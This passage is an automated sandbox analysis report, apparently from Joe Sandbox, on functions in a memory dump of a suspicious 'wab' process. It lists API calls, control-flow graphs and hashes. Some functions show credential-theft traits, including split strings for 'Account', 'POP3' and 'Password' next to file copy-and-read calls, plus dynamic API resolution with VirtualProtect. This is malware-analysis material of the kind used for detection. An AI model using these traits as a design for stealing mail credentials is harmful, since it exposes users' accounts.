                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 222EC860
                                                  • Part of subcall function 222EC7E6: GetModuleHandleA.KERNEL32(222EC7DD), ref: 222EC7E6
                                                  • Part of subcall function 222EC7E6: GetProcAddress.KERNEL32(00000000,222EC7F4), ref: 222EC804
                                                  • Part of subcall function 222EC7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,222EC7F4,222EC7DD), ref: 222EC816
                                                  • Part of subcall function 222EC7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,222EC7F4,222EC7DD), ref: 222EC82A
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                • String ID:
                                                • API String ID: 2099061454-0
                                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                • Instruction ID: 7b0267aefc680e6473f41756f7c7876867d16fe2fc807455dab3566ed711470d
                                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                • Instruction Fuzzy Hash: 65218B614083822FE713C7F44F04BA63FD88B13364FC82696D16ECB14BD1A6B801E3A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222EC803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 107 222ec803-222ec80b GetProcAddress 108 222ec82d 107->108 109 222ec80d-222ec81a VirtualProtect 107->109 112 222ec82f-222ec833 108->112 110 222ec82c 109->110 111 222ec81c-222ec82a VirtualProtect 109->111 110->108 111->110 113 222ec835-222ec83d GetModuleHandleA 112->113 114 222ec872 call 222ec877 112->114 116 222ec83f-222ec847 113->116 116->116 117 222ec849-222ec84c 116->117 117->112 118 222ec84e-222ec850 117->118 119 222ec856-222ec85e 118->119 120 222ec852-222ec854 118->120 121 222ec85f-222ec865 GetProcAddress 119->121 120->121 124 222ec866-222ec86e 121->124 126 222ec870 124->126 126->117
                                                APIs
                                                • GetProcAddress.KERNEL32(00000000,222EC7F4), ref: 222EC804
                                                • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,222EC7F4,222EC7DD), ref: 222EC816
                                                • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,222EC7F4,222EC7DD), ref: 222EC82A
                                                • GetModuleHandleA.KERNEL32(?,222EC7DD), ref: 222EC838
                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 222EC860
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: AddressProcProtectVirtual$HandleModule
                                                • String ID:
                                                • API String ID: 2152742572-0
                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                • Instruction ID: 48b1b691b6695d77d74336dc442f7461200d0a30baed20e8e69352c231493501
                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                • Instruction Fuzzy Hash: FCF0DC4054534228AA17C1F40E44AAA5BCC8A27260BD03A12A26EC718BC8A3A906A2B2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 222E60E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 222E61DA
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 222E61E4
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 222E61F1
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID:
                                                • API String ID: 3906539128-0
                                                • Opcode ID: 9b2316bcf868b2d5e525f7bd01bfb48fbc7b12b1e48201583f4219788e2417c8
                                                • Instruction ID: d5e0f8d04ec9893655c5064aff8fb611b94f3359a2173f3b1c353e0b7c2788be
                                                • Opcode Fuzzy Hash: 9b2316bcf868b2d5e525f7bd01bfb48fbc7b12b1e48201583f4219788e2417c8
                                                • Instruction Fuzzy Hash: 0F31F37494131C9BCB61DF24CD8879DBBB8EF08310F5042DAE81DA7264E775AB819F44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E4AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32(?,?,222E4A8A,?,222F2238,0000000C,222E4BBD,00000000,00000000,00000001,222E2082,222F2108,0000000C,222E1F3A,?), ref: 222E4AD5
                                                • TerminateProcess.KERNEL32(00000000,?,222E4A8A,?,222F2238,0000000C,222E4BBD,00000000,00000000,00000001,222E2082,222F2108,0000000C,222E1F3A,?), ref: 222E4ADC
                                                • ExitProcess.KERNEL32 ref: 222E4AEE
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: Process$CurrentExitTerminate
                                                • String ID:
                                                • API String ID: 1703294689-0
                                                • Opcode ID: 451be3f6bd46837edfd86de904d751beb5db29a41da5fc05923c68d715075051
                                                • Instruction ID: cb799419758c9f20e675f486cce277434ac47bd8bf7e27b14f611f4f47f38bd6
                                                • Opcode Fuzzy Hash: 451be3f6bd46837edfd86de904d751beb5db29a41da5fc05923c68d715075051
                                                • Instruction Fuzzy Hash: EBE01A35000314EFCF016F14CD08A493B2AEB04351B804414F95A4A52ADB3BF982EA44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E6580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .
                                                • API String ID: 0-248832578
                                                • Opcode ID: c788e16a62d168ca09c3f28463c6cd8e03b38a52151fbc9ee2771cbaf764eb50
                                                • Instruction ID: e2428223d43eaa57d33183b5fa4eb211a59ff57a3080381f8c715b05f3d5e4c3
                                                • Opcode Fuzzy Hash: c788e16a62d168ca09c3f28463c6cd8e03b38a52151fbc9ee2771cbaf764eb50
                                                • Instruction Fuzzy Hash: 683148B190030AAFCB148E34CD84EFB7BBDDB85304F4001ACE91ED725AE636BA449B50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: HeapProcess
                                                • String ID:
                                                • API String ID: 54951025-0
                                                • Opcode ID: 94c0ca70ac9c75fdb55e6a058eee1404f58202c3e3e9304b3895c807e9cb46f1
                                                • Instruction ID: faba184d731aca518a1cf53fab11149d88608d312de6c388098c5a7b1537ef8c
                                                • Opcode Fuzzy Hash: 94c0ca70ac9c75fdb55e6a058eee1404f58202c3e3e9304b3895c807e9cb46f1
                                                • Instruction Fuzzy Hash: DAA01130282202CF83208E328B0E20C3AACAA003A030A0A28AE08C8008EB2EC000AA00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 136 222e173a-222e17fe call 222ec030 call 222e2c40 * 2 143 222e1803 call 222e1cca 136->143 144 222e1808-222e180c 143->144 145 222e19ad-222e19b1 144->145 146 222e1812-222e1816 144->146 146->145 147 222e181c-222e1837 call 222e1ede 146->147 150 222e199f-222e19ac call 222e1ee7 * 2 147->150 151 222e183d-222e1845 147->151 150->145 152 222e184b-222e184e 151->152 153 222e1982-222e1985 151->153 152->153 157 222e1854-222e1881 call 222e44b0 * 2 call 222e1db7 152->157 155 222e1987 153->155 156 222e1995-222e1999 153->156 159 222e198a-222e198d call 222e2c40 155->159 156->150 156->151 170 222e193d-222e1943 157->170 171 222e1887-222e189f call 222e44b0 call 222e1db7 157->171 165 222e1992 159->165 165->156 172 222e197e-222e1980 170->172 173 222e1945-222e1947 170->173 171->170 184 222e18a5-222e18a8 171->184 172->159 173->172 175 222e1949-222e194b 173->175 177 222e194d-222e194f 175->177 178 222e1961-222e197c call 222e16aa 175->178 180 222e1955-222e1957 177->180 181 222e1951-222e1953 177->181 178->165 185 222e195d-222e195f 180->185 186 222e1959-222e195b 180->186 181->178 181->180 188 222e18aa-222e18c2 call 222e44b0 call 222e1db7 184->188 189 222e18c4-222e18dc call 222e44b0 call 222e1db7 184->189 185->172 185->178 186->178 186->185 188->189 198 222e18e2-222e193b call 222e16aa call 222e15da call 222e2c40 * 2 188->198 189->156 189->198 198->156
                                                APIs
                                                  • Part of subcall function 222E1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 222E1D1B
                                                  • Part of subcall function 222E1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 222E1D37
                                                  • Part of subcall function 222E1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 222E1D4B
                                                • _strlen.LIBCMT ref: 222E1855
                                                • _strlen.LIBCMT ref: 222E1869
                                                • _strlen.LIBCMT ref: 222E188B
                                                • _strlen.LIBCMT ref: 222E18AE
                                                • _strlen.LIBCMT ref: 222E18C8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: _strlen$File$CopyCreateDelete
                                                • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                • API String ID: 3296212668-3023110444
                                                • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                • Instruction ID: f65b6acb0fa4dfe2c0413bb5187cd56ac139bffaedc0465a5ceff4bd6cb239e8
                                                • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                • Instruction Fuzzy Hash: 7D611A71D00329ABEF29CBA4CC40BDEB7B9AF15304F804166D10EA7268DB767E45EB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E19B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: _strlen
                                                • String ID: %m$~$Gon~$~F@7$~dra
                                                • API String ID: 4218353326-230879103
                                                • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                • Instruction ID: 5c4fdd73cf0675b13238db1e58f8406df24701fb481846090b3707883f54b29b
                                                • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                • Instruction Fuzzy Hash: 647127B1D003295BCB169BB48C94AEF7BFC9F19300F9000A6D64DD7245E679BB85DBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E7CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 276 222e7cc2-222e7cd6 277 222e7cd8-222e7cdd 276->277 278 222e7d44-222e7d4c 276->278 277->278 281 222e7cdf-222e7ce4 277->281 279 222e7d4e-222e7d51 278->279 280 222e7d93-222e7dab call 222e7e35 278->280 279->280 282 222e7d53-222e7d90 call 222e571e * 4 279->282 288 222e7dae-222e7db5 280->288 281->278 284 222e7ce6-222e7ce9 281->284 282->280 284->278 287 222e7ceb-222e7cf3 284->287 289 222e7d0d-222e7d15 287->289 290 222e7cf5-222e7cf8 287->290 292 222e7db7-222e7dbb 288->292 293 222e7dd4-222e7dd8 288->293 295 222e7d2f-222e7d43 call 222e571e * 2 289->295 296 222e7d17-222e7d1a 289->296 290->289 294 222e7cfa-222e7d0c call 222e571e call 222e90ba 290->294 298 222e7dbd-222e7dc0 292->298 299 222e7dd1 292->299 303 222e7dda-222e7ddf 293->303 304 222e7df0-222e7dfc 293->304 294->289 295->278 296->295 301 222e7d1c-222e7d2e call 222e571e call 222e91b8 296->301 298->299 307 222e7dc2-222e7dd0 call 222e571e * 2 298->307 299->293 301->295 311 222e7ded 303->311 312 222e7de1-222e7de4 303->312 304->288 306 222e7dfe-222e7e0b call 222e571e 304->306 307->299 311->304 312->311 320 222e7de6-222e7dec call 222e571e 312->320 320->311
                                                APIs
                                                • ___free_lconv_mon.LIBCMT ref: 222E7D06
                                                  • Part of subcall function 222E90BA: _free.LIBCMT ref: 222E90D7
                                                  • Part of subcall function 222E90BA: _free.LIBCMT ref: 222E90E9
                                                  • Part of subcall function 222E90BA: _free.LIBCMT ref: 222E90FB
                                                  • Part of subcall function 222E90BA: _free.LIBCMT ref: 222E910D
                                                  • Part of subcall function 222E90BA: _free.LIBCMT ref: 222E911F
                                                  • Part of subcall function 222E90BA: _free.LIBCMT ref: 222E9131
                                                  • Part of subcall function 222E90BA: _free.LIBCMT ref: 222E9143
                                                  • Part of subcall function 222E90BA: _free.LIBCMT ref: 222E9155
                                                  • Part of subcall function 222E90BA: _free.LIBCMT ref: 222E9167
                                                  • Part of subcall function 222E90BA: _free.LIBCMT ref: 222E9179
                                                  • Part of subcall function 222E90BA: _free.LIBCMT ref: 222E918B
                                                  • Part of subcall function 222E90BA: _free.LIBCMT ref: 222E919D
                                                  • Part of subcall function 222E90BA: _free.LIBCMT ref: 222E91AF
                                                • _free.LIBCMT ref: 222E7CFB
                                                  • Part of subcall function 222E571E: HeapFree.KERNEL32(00000000,00000000,?,222E924F,?,00000000,?,00000000,?,222E9276,?,00000007,?,?,222E7E5A,?), ref: 222E5734
                                                  • Part of subcall function 222E571E: GetLastError.KERNEL32(?,?,222E924F,?,00000000,?,00000000,?,222E9276,?,00000007,?,?,222E7E5A,?,?), ref: 222E5746
                                                • _free.LIBCMT ref: 222E7D1D
                                                • _free.LIBCMT ref: 222E7D32
                                                • _free.LIBCMT ref: 222E7D3D
                                                • _free.LIBCMT ref: 222E7D5F
                                                • _free.LIBCMT ref: 222E7D72
                                                • _free.LIBCMT ref: 222E7D80
                                                • _free.LIBCMT ref: 222E7D8B
                                                • _free.LIBCMT ref: 222E7DC3
                                                • _free.LIBCMT ref: 222E7DCA
                                                • _free.LIBCMT ref: 222E7DE7
                                                • _free.LIBCMT ref: 222E7DFF
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                • String ID:
                                                • API String ID: 161543041-0
                                                • Opcode ID: 5f115ffed6cfb33fb6366041b769f39c3b11b01eacbb4f01b43d9769c65c91f3
                                                • Instruction ID: 42d8e139bb675be4eaaf90a115755d7491c8f404606dd24dcd4877ab28b71268
                                                • Opcode Fuzzy Hash: 5f115ffed6cfb33fb6366041b769f39c3b11b01eacbb4f01b43d9769c65c91f3
                                                • Instruction Fuzzy Hash: 7D316D31510306DFDB219E38DE41BEA77EAEF00354F904469EA4ED7198DB32B9A0A720
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E59D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • _free.LIBCMT ref: 222E59EA
                                                  • Part of subcall function 222E571E: HeapFree.KERNEL32(00000000,00000000,?,222E924F,?,00000000,?,00000000,?,222E9276,?,00000007,?,?,222E7E5A,?), ref: 222E5734
                                                  • Part of subcall function 222E571E: GetLastError.KERNEL32(?,?,222E924F,?,00000000,?,00000000,?,222E9276,?,00000007,?,?,222E7E5A,?,?), ref: 222E5746
                                                • _free.LIBCMT ref: 222E59F6
                                                • _free.LIBCMT ref: 222E5A01
                                                • _free.LIBCMT ref: 222E5A0C
                                                • _free.LIBCMT ref: 222E5A17
                                                • _free.LIBCMT ref: 222E5A22
                                                • _free.LIBCMT ref: 222E5A2D
                                                • _free.LIBCMT ref: 222E5A38
                                                • _free.LIBCMT ref: 222E5A43
                                                • _free.LIBCMT ref: 222E5A51
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 8d6d2d6d2e8c5201cffd6fb99e757235eaf2e119ea82a7bad1dc9339421cfabc
                                                • Instruction ID: 4877cdbaca1e23c6a1a146f08394d053cb65bcbf41bd425d96c1701246061c2b
                                                • Opcode Fuzzy Hash: 8d6d2d6d2e8c5201cffd6fb99e757235eaf2e119ea82a7bad1dc9339421cfabc
                                                • Instruction Fuzzy Hash: A1117A79520348EFCB21DF54CD41CDD3F69EF14390B954195BA0E4B129DA32FA70AB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E1CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 222E1D1B
                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 222E1D37
                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 222E1D4B
                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 222E1D58
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 222E1D72
                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 222E1D7D
                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 222E1D8A
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                • String ID:
                                                • API String ID: 1454806937-0
                                                • Opcode ID: 86f549788cb2dcb4992d56432fd8abb7d93950479c8125fb0bc453e5be76bbb2
                                                • Instruction ID: eadbcc542e3676bbe8299132e858c69bcfa50ccff3dddf1647c334a42dfcba73
                                                • Opcode Fuzzy Hash: 86f549788cb2dcb4992d56432fd8abb7d93950479c8125fb0bc453e5be76bbb2
                                                • Instruction Fuzzy Hash: 89214CB194132CEFD7109BA0CC8CFEE76ACEB18354F4409A5F91AD2148D676AE45AA70
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E9492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 377 222e9492-222e94ef GetConsoleCP 378 222e94f5-222e9511 377->378 379 222e9632-222e9644 call 222e2ada 377->379 381 222e952c-222e953d call 222e7c19 378->381 382 222e9513-222e952a 378->382 389 222e953f-222e9542 381->389 390 222e9563-222e9565 381->390 384 222e9566-222e9575 call 222e79e6 382->384 384->379 391 222e957b-222e959b WideCharToMultiByte 384->391 392 222e9548-222e955a call 222e79e6 389->392 393 222e9609-222e9628 389->393 390->384 391->379 395 222e95a1-222e95b7 WriteFile 391->395 392->379 399 222e9560-222e9561 392->399 393->379 397 222e962a-222e9630 GetLastError 395->397 398 222e95b9-222e95ca 395->398 397->379 398->379 400 222e95cc-222e95d0 398->400 399->391 401 222e95fe-222e9601 400->401 402 222e95d2-222e95f0 WriteFile 400->402 401->378 404 222e9607 401->404 402->397 403 222e95f2-222e95f6 402->403 403->379 405 222e95f8-222e95fb 403->405 404->379 405->401
                                                APIs
                                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,222E9C07,?,00000000,?,00000000,00000000), ref: 222E94D4
                                                • __fassign.LIBCMT ref: 222E954F
                                                • __fassign.LIBCMT ref: 222E956A
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 222E9590
                                                • WriteFile.KERNEL32(?,?,00000000,222E9C07,00000000,?,?,?,?,?,?,?,?,?,222E9C07,?), ref: 222E95AF
                                                • WriteFile.KERNEL32(?,?,00000001,222E9C07,00000000,?,?,?,?,?,?,?,?,?,222E9C07,?), ref: 222E95E8
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                • String ID:
                                                • API String ID: 1324828854-0
                                                • Opcode ID: 7fecb981f1ded095d9dca9abd4d57b1db2c17226b0b062bd153d6387bf5c8377
                                                • Instruction ID: 66156f07ec8414612fe229317b983998503fe6710bf9a747b2fba2ad4801259b
                                                • Opcode Fuzzy Hash: 7fecb981f1ded095d9dca9abd4d57b1db2c17226b0b062bd153d6387bf5c8377
                                                • Instruction Fuzzy Hash: 31519EB1D00349AFDB10CFA4CC95ADEBBF8EF49310F14451BEA5AE7285D632A941CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E3370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 406 222e3370-222e33b5 call 222e3330 call 222e37a7 411 222e3416-222e3419 406->411 412 222e33b7-222e33c9 406->412 413 222e341b-222e3428 call 222e3790 411->413 414 222e3439-222e3442 411->414 412->414 415 222e33cb 412->415 418 222e342d-222e3436 call 222e3330 413->418 417 222e33d0-222e33e7 415->417 419 222e33fd 417->419 420 222e33e9-222e33f7 call 222e3740 417->420 418->414 421 222e3400-222e3405 419->421 428 222e340d-222e3414 420->428 429 222e33f9 420->429 421->417 424 222e3407-222e3409 421->424 424->414 427 222e340b 424->427 427->418 428->418 430 222e33fb 429->430 431 222e3443-222e344c 429->431 430->421 432 222e344e-222e3455 431->432 433 222e3486-222e3496 call 222e3774 431->433 432->433 435 222e3457-222e3466 call 222ebbe0 432->435 439 222e34aa-222e34c6 call 222e3330 call 222e3758 433->439 440 222e3498-222e34a7 call 222e3790 433->440 441 222e3468-222e3480 435->441 442 222e3483 435->442 440->439 441->442 442->433
                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 222E339B
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 222E33A3
                                                • _ValidateLocalCookies.LIBCMT ref: 222E3431
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 222E345C
                                                • _ValidateLocalCookies.LIBCMT ref: 222E34B1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 1170836740-1018135373
                                                • Opcode ID: 0a516c5781df024265cd3beed429a9670090761829b9829ccd2d589ccf62e8ab
                                                • Instruction ID: a6d223f34eccdfb855142f147eadc7332296b8503e2faea00b994c78abebdb47
                                                • Opcode Fuzzy Hash: 0a516c5781df024265cd3beed429a9670090761829b9829ccd2d589ccf62e8ab
                                                • Instruction Fuzzy Hash: C741D434E003499BCB00CF68CE44AAEBBF5AF45325F808195E91E9F259D737BA01DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 222E925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 222E9221: _free.LIBCMT ref: 222E924A
                                                • _free.LIBCMT ref: 222E92AB
                                                  • Part of subcall function 222E571E: HeapFree.KERNEL32(00000000,00000000,?,222E924F,?,00000000,?,00000000,?,222E9276,?,00000007,?,?,222E7E5A,?), ref: 222E5734
                                                  • Part of subcall function 222E571E: GetLastError.KERNEL32(?,?,222E924F,?,00000000,?,00000000,?,222E9276,?,00000007,?,?,222E7E5A,?,?), ref: 222E5746
                                                • _free.LIBCMT ref: 222E92B6
